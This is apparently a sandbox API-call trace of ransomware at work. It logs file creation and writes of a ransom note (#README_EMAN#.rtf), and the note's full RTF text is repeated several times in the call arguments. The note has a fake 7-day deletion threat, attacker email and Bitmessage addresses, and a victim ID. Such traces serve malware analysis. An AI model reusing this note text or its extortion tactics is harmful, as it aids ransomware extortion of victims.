INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.310] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.311] CloseHandle (hObject=0x294) returned 1 [0285.313] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\#readme_eman#.rtf")) returned 0xffffffff [0285.313] GetLastError () returned 0x2 [0285.313] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.314] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.314] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.314] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 